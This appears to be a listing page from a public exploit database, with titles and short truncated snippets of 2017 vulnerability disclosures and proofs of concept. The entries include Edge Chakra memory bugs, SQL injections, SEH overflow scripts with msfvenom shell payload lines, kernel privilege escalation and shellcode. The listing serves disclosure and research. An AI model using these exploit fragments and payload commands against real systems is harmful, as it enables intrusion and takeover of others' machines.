Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2

a0 = ; return 0; ; a0.toString; main; I just changed "var b = new Uint32Array100;" to "var b = new Uint32Array0;", and it worked well. PoC: -- 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array0; // 0 // force t...

Doctor Patient Project 1.0 - SQL Injection

Exploit Title: Doctor Patient Project 1.0 - Multiple Vulnerabilities Dork: N/A Date: 17.08.2017 Vendor Homepage : http://surajkumar.in/ Software Link: http://surajkumar.in/product/doctor-patient-project-php/ Demo: http://surajkumar.in/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...

Microsoft Edge Chakra - NULL Pointer Dereference

spreadIndices = nullptr // This function emits the arguments for a call. // ArgOut's with uses immediately following defs. EmitArgListStartthisLocation, byteCodeGenerator, funcInfo, callSiteId; Js::RegSlot evalLocation = Js::Constants::NoRegister; // // If Emitting arguments for eval and assignin...

Microsoft Edge Chakra - 'EmitNew' Integer Overflow

sxCall.argCount; argCount++; // include "this" BOOL fSideEffectArgs = FALSE; unsigned int tmpCount = CountArgumentspnode-sxCall.pnodeArgs, &fSideEffectArgs; AssertargCount == tmpCount; if argCount != Js::ArgSlotargCount Js::Throw::OutOfMemory; ... "Js::ArgSlot" is a 16 bit unsigned integer type...

Microsoft Edge Chakra - Uninitialized Arguments (2)

void Parser::ParseFncFormalsParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags ... if IsES6DestructuringEnabled && IsPossiblePatternStart ... // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward. for ParseNodePtr...

Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service)

::NoSlots return false; propertyIndex = deletedPropertyIndex; deletedPropertyIndex = staticcastTaggedInt::ToInt32object-GetSlotdeletedPropertyIndex; return true; bool SimpleDictionaryUnorderedTypeHandle::TryUndeleteProperty DynamicObject const object, const TPropertyIndex existingPropertyIndex,...

Microsoft Edge Chakra - Heap Buffer Overflow

IsCoroutine ... else InterpreterStackFrame::Setup setupfunction, args; sizet varAllocCount = setup.GetAllocationVarCount; //printf"varAllocCount: %d%X\r\n", varAllocCount, varAllocCount; sizet varSizeInBytes = varAllocCount sizeofVar; // // Allocate a new InterpreterStackFrame instance on the...

Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service

/ IOFireWireFamily-null-deref.c Brandon Azad NULL pointer dereference in IOFireWireUserClient::setAsyncRefIsochChannelForceStop. Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip / include int main int ret = 0; ioservicet service =...

RPi Cam Control < 6.3.14 - Multiple Vulnerabilities

Exploit Title: RPi Cam Control = v6.3.14 RCE Multiple Vulnerabilities - preview.php Date: 16/08/2017 Exploit Author: Alexander Korznikov Vendor Homepage: https://github.com/silvanmelchior/RPiCamWebInterface Software Link: https://github.com/silvanmelchior/RPiCamWebInterface Version: = v6.3.14 Dat...

Microsoft Edge 38.14393.1066.0 - 'CInputDateTimeScrollerElement::_SelectValueInternal' Out-of-Bounds Read

input:focus transform: scale10; UpdateSelectedthis-arrayatoffset0xB8this-indexatoffset0xD4.ptratindex0, ...; ... The problem is that the index in the PoC has unsigned 32-bit value of 0xffffffff, possibly because the data structure has not been properly initialized, which leads to out-of-bound...

AdvanDate iCupid Dating Software 12.2 - SQL Injection

Exploit Title: iCupid Dating Software 12.2 - SQL Injection Dork: N/A Date: 15.08.2017 Vendor Homepage : https://www.advandate.com/ Software Link: https://www.advandate.com/dating-software-features/ Demo: https://demo.advandate.com/ Version: 12.2 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...

ClipBucket 2.8.3 - Multiple Vulnerabilities

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title ClipBucket 2.8.3 - Multiple Vulnerabilities .:. Google Dorks .:. "Forged by ClipBucket" inurl:viewcollection.php?cid= .:. Date: August 15, 2017 .:. Exploit Author: bRpsd .:. Skype contact: vegno...

Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)

!/usr/bin/python Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file' SEH Buffer Overflow Unicode Date: 14-06-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 How to exploit: Open IDM - Downloads - Find - paste exploit string into 'Find file' text field msfvenom -p...

ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)

!/usr/bin/python Exploit Title: ALL Player v7.4 SEH Buffer Overflow Unicode Version: 7.4 Date: 15-08-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 head = "http://" seh = "\x0f\x47" 0x0047000f nseh = "\x61\x41" popad align junk = "\x41" 301 junk2 = "\x41" 45 msfvenom -p windows/shellbindt...

Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting

Vulnerability type: Multiple Stored Cross Site Scripting Vendor: Quali Product: CloudShell Affected version: v7.1.0.6508 Patch 6 Patched version: v8 and up Credit: Benjamin Lee CVE ID: CVE-2017-9767 ========================================================== Overview Quali CloudShell v7.1.0.6508...

RPi Cam Control < 6.3.14 - Remote Command Execution

RPi Cam Control = v6.3.14 RCE preview.php Multiple Vulnerabilities A web interface for the RPi Cam Vendor github: https://github.com/silvanmelchior/RPiCamWebInterface Date 16/08/2017 Discovered by @nopernik https://www.linkedin.com/in/nopernik http://www.korznikov.com RPi Cam Control = v6.3.14 is...

Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation

Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html Abstract Xamarin Studio is an Integrated Development Environment IDE used to create iOS, Mac and Android applications. Xamarin Studio supports...

Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)

// A proof-of-concept local root exploit for CVE-2017-1000112. // Includes KASLR and SMEP bypasses. No SMAP bypass. // Tested on Ubuntu trusty 4.4.0- and Ubuntu xenial 4-8-0- kernels. // // EDB Note: Also included the work from...

Tomabo MP4 Converter 3.19.15 - Denial of Service

!/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CVE : None Generate a .m3u file using the python scri...

RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)

!---Enable...

AirMaster 3000M - Multiple Vulnerabilities

?php Exploit Title: AirMaster 3000M multiple Vulnerabilities Date: 2017/08/12 Exploit Author: Koorosh Ghorbani Author Homepage: http://8thbit.net/ Vendor Homepage: http://mobinnet.ir/ Software Version: V2.0.1B1044 Web Server: GoAhead-Webs/2.5.0 define'isDebug',false; define'specialCookie','Cookie...

De-Journal 1.0 - SQL Injection

Exploit Title: De-Journal - Academic Journal and Peer Review System 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/dejournal-academic-journal-and-peer-review-system/19533981 Demo: https://demo.sarutech.com/dejourna...

DeWorkshop 1.0 - SQL Injection

Exploit Title: De-Workshop - Auto Workshop Portal 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737 Demo: https://demo.sarutech.com/deworkshop/ Version: 1.0 Category: Webapps...

De-Tutor 1.0 - SQL Injection

Exploit Title: De-Tutor - Private Tutoring and Admission Processing 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/detutor-private-tutoring-and-admission-processing/19053430 Demo: https://demo.sarutech.com/detutor/...

Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure

var n = 0; function go document.addEventListener"DOMNodeRemoved", eventhandler; eventhandler; function eventhandler n++; ifn==5 return; //prevent going into an infinite recursion t.defaultValue = "aaaaaaaaaaaaaaaaaaaa"; f.reset; aaa !-- ========================================= This seems to be t...

Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass

Exploit Title: Red-Gate SQL Monitor authentication bypass Version: Redgate SQL Monitor before 3.10 and 4.x before 4.2 Date: 2017-08-10 Red-Gate made a security announcement and publicly released the fixed version more than two years before this exploit was published Vendor Advisory:...

Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting

Exploit Title: Piwigo plugin User Tag , Persistent XSS Date: 10 Aug, 2017 Extension Version: 0.9.0 Software Link: http://piwigo.org/basics/downloads Extension link : http://piwigo.org/ext/extensionview.php?eid=441 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website:...

GIF Collection 2.0 - SQL Injection

Exploit Title: GIF Collection 2.0 - SQL Injection Dork: N/A Date: 10.08.2017 Vendor Homepage : http://www.scriptfolder.com/ Software Link: http://www.scriptfolder.com/scriptfolder-gif-collection-2-0/ Demo: http://gif2.scriptfolder.com/ Version: 2.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...

ImageBay 1.0 - SQL Injection

Exploit Title: ImageBay 1.0 - SQL Injection Dork: N/A Date: 10.08.2017 Vendor Homepage : http://www.scriptfolder.com/ Software Link: http://www.scriptfolder.com/imagebay-publish-or-share-photography-and-pictures/ Demo: http://imagebay.scriptfolder.com/ Version: 1.0 Category: Webapps Tested on:...

WebFile Explorer 1.0 - Arbitrary File Download

Exploit Title: WebFile Explorer 1.0 - Arbitrary File Download Dork: N/A Date: 09.08.2017 Vendor Homepage : http://speicher.host/ Software Link: https://codecanyon.net/item/webfile-explorer/20366192/ Demo: http://speicher.host/envato/codecanyon/demo/web-file-explorer/ Version: 1.0 Category: Webapp...

Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery

Exploit Title: CSRF Date: August 9, 2017 Software Link: https://www.symantec.com/products/messaging-gateway Exploit Author: Dhiraj Mishra Contact: http://twitter.com/mishradhiraj Website: http://datarift.blogspot.in/ CVE: CVE-2017-6328 Category: Symantec Messaging Gateway 1. Description The...

NoMachine 5.3.9 - Local Privilege Escalation

""" Exploit Title: NoMachine LPE - Local Privilege Escalation Date: 09/08/2017 Exploit Author: Daniele Linguaglossa Vendor Homepage: https://www.nomachine.com Software Link: https://www.nomachine.com Version: 5.3.9 Tested on: OSX CVE : CVE-2017-12763 NoMachine uses a file called nxexec in order t...

DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal

DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Remote File Disclosures Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 build 7072.0 build...

DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration

!/usr/bin/env python DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 build...

DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery

!-- DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Stored XSS And CSRF Vulnerabilities Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 buil...

Android Bluetooth - 'Blueborne' Information Leak (1)

from pwn import import bluetooth if not 'TARGET' in args: log.info'Usage: python CVE-2017-0781.py TARGET=XX:XX:XX:XX:XX:XX' exit target = args'TARGET' count = 30 Amount of packets to send port = 0xf BTPSMBNEP context.arch = 'arm' BNEPFRAMECONTROL = 0x01 BNEPSETUPCONNECTIONREQUESTMSG = 0x01 def...

DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery

DALIM SOFTWARE ES Core 5.0 build 7184.1 Server-Side Request Forgery Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 build 7072.0 build 7051.3...

VMware WorkStation 12.5.5 - Virtual Machine Escape

VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.5 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 Known issues Failing to heap manipulation causes host process crash. Not quite elaborate because I'm not good at doing heap "fengshui" on winows...

Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)

Sources: - https://github.com/sensepost/gdi-palettes-exp - https://sensepost.com/blog/2017/abusing-gdi-objects-for-ring0-primitives-revolution/ Windows 7 SP1 x86 exploit presented at DEF CON 25 involving the abuse of a newly discovered GDI object abuse technique. DC25 5A1F - Demystifying Windows...

Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution

Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1 Date: 08/08/2017 Exploit Authors: Jared Arave, Cale Smith, Benny Husted Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...

Unitrends UEB 9.1 - Privilege Escalation

Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1 Date: 08/08/2017 Exploit Authors: Benny Husted, Jared Arave, Cale Smith Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...

Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution

''' Source: https://blogs.securiteam.com/index.php/archives/3356 Vulnerability details The remote code execution is a combination of 4 different vulnerabilities: Upload arbitrary files to the specified directories Log in with a fake authentication mechanism Log in to Photo Station with any identi...

WildMIDI 0.4.2 - Multiple Vulnerabilities

wildmidi multiple vulnerabilities ================ Author : qflb.wu =============== Introduction: ============= WildMIDI is a simple software midi player which has a core softsynth library that can be use with other applications.The WildMIDI library uses Gravis Ultrasound patch files to convert...

Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution

Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1 Date: 08/08/2017 Exploit Authors: Cale Smith, Benny Husted, Jared Arave Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...

WordPress Plugin Easy Modal 2.0.17 - SQL Injection

DefenseCode ThunderScan SAST Advisory WordPress Easy Modal Plugin Multiple Security Vulnerabilities Advisory ID: DC-2017-01-007 Advisory Title: WordPress Easy Modal Plugin Multiple Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Easy Modal plugin...

Linux x86 - /bin/sh Shellcode (24 bytes)

Linux x86 - /bin/sh Shellcode 24 bytes. Shellcode exploit for Linx86 platform / ;Title: Linux/x86 - /bin/sh Shellcode ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x86 ;Description: This shellcode baased on stack method to Execute...

Microsoft Windows - '.LNK' Shortcut File Code Execution

!/usr/bin/python -- coding: utf-8 -- Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability CVE : 2017-8464 Authors : ykoster, nixawk Notice : Only for educational purposes. Support : python2 import struct def generateSHELLLINKHEADER: | | | | | | | | | | | | | | | | | | | | | | | | | | |...

Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting

// Device : Technicolor TC7337 // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html // XSS through SSID : ' Exactly 32 bytes uu // ^ // 5char domains are running | 'src' does not requires quotes , and passing the URL with ony '//' // out, grab yours ! +--- it will cause the browser to...

Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure

Vulnerability Summary The following advisory describes sensitive information Disclosure found in Tiandy IP cameras version 5.56.17.120 Tianjin Tiandy Digital Technology Co., Ltd Tiandy Tech is “one of top 10 leading CCTV manufacturer in China and a global supplier of advanced video surveillance...

VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1296 VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP Platform: VirtualBox v5.1.22 r115126 x64 Tested on Windows 10 Class: Elevation of Privilege Summary: The process hardening implemented by the VirtualBox driver can ...